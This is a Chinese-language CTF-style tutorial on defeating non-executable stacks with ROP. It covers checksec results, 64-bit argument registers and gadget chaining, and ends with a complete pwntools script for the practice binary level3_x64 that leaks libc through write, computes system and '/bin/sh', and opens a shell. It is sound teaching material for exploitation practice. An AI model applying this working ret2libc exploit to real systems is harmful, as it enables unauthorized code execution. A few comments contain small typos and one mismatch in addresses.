NX 栈不可执行的绕过方式--ROP链

• 目标程序下载
  
  提取码：5o0a

• 环境:Ubuntu linux

• 工具

  1. pwn-gdb
  2. pwntools python库
  3. ROPgadget

( 这些工具可以到github官网找)

1.检查程序开了哪些安全机制

checksec 检查保护机制
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found       金丝雀
    NX:       NX enabled            栈不可执行Windows平台上称其为DEP
    PIE:      No PIE (0x8048000)    内存地址随机化机制,Windows平台上称其为ASLR

2.在ida中静态查看看程序中的漏洞点

可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节

多出来的 0x200-0x80 就会造成溢出

函数调用方式的基本介绍

32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数

而64位程序默认调用函数的方式则不同

• RDI 中存放第1个参数
• RSI 中存放第2个参数
• RDX 中存放第3个参数
• RCX 中存放第4个参数
• R8 中存放第5个参数
• R9 中存放第6个参数
• 如果还有更多的参数,再把过多那几个的参数像32位程序一样压入栈中
• 然后 call

rop 的基本介绍

这里只说一下64位程序的rop,了解完64位的rop,32位的程序稍微做一下函数调用方式上的改变就好了

比如:现在有3个函数 a(&arg1,arg2),b(arg3,arg4),c(arg1),其中b函数有栈溢出漏洞,a函数是个输入函数,c函数是system函数

我们要利用b函数的漏洞,运行c函数,而c函数需要从a函数上得到"/bin/sh"这种参数

该怎么做呢?

首先我们要知道 call 指令与 ret 指令是有两步操作的

call指令:

1. 先把下一句指令的地址压入栈顶 rsp+=8
2. 跳转到call后面跟的地址上去

ret指令:

1. 跳转到rsp所指的地址(之前的call压入的)
2. rsp-=8

如果我们调用函数时不使用call指令呢?

函数结束时,移动栈顶(清栈) jmp [rsp] ,rsp-=8

程序中找 pop rsi,pop rdi,ret 这种相连的指令(不相连也可以,不要再影响rsi,rdi就好),把地址记录下来pop_ret

程序中找 pop rdi,ret 这种相连的指令,把地址记录下来pop_ret2

好,我们把c函数的rbp+8的位置写 pop_ret 的地址

• rbp+8 pop_ret
• rbp+16 arg2
• rbp+24 arg1
• rbp+32 a函数的地址
• rbp+40 pop_ret2
• rbp+48 arg1
• rbp+56 c函数的地址

当b运行结束后,会返回到 pop_ret 位置

pop rsi rsi=arg2

pop rdi rdi=agr1

jmp a函数

a函数 执行完后 会ret 到pop_ret2

pop rdi rdi=arg1

然后运行c函数

---

回到我们的目标程序

gdb打开程序

gdb level3_x64 -q
b mian

vmmap

查看libc的系统位置

ROPgadget --binary level3_x64 --only 'pop|ret'

找到main函数的地址

from pwn import *
p = process("./level3_x64") #本地调试
#p = remote("x.x.x.x",xxxx) #远程调试remote(ip,port)
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
elf = ELF("./level3_x64")

pop_rdi_ret = 0x4006b3
pop_rsi_r15_ret = 0x4006b1
main_addr = 0x40061A
write_plt = elf.plt["write"]
write_got = elf.got["write"]

padding = (0x80 + 8 ) * "a"
#0x80字符串长度要覆盖过去,+8是要覆盖rbp

payload1 = padding + p64(pop_rdi_ret) +\
 p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) +\
 p64(0) + p64(write_plt) + p64(main_addr)
#通过plt表中的write调用 write(1,write_plt,...)
#第三个参数只要当前rdx寄存器中的数大于8就好
#然后返回main函数重新运行,准备重新触发漏洞

p.sendafter("Input:\n",payload1)
addr = u64(p.recv(6).ljust(8,"\x00"))
#通过write_plt找泄露libc中write的地址 

libc.address = addr - libc.symbols["write"]
#通过write的地址 找libc基地址

binsh=libc.search("/bin/sh").next()
#通过libc基地址找libc中这个字符串的地址

system=libc.symbols["system"]
#通过libc基地址找libc中systemp函数的地址

payload2 = padding + p64(pop_rdi_ret)+ p64(binsh)+p64(system)
#system("bin/sh") 

p.send(payload2)
p.interactive()

成功启动了shell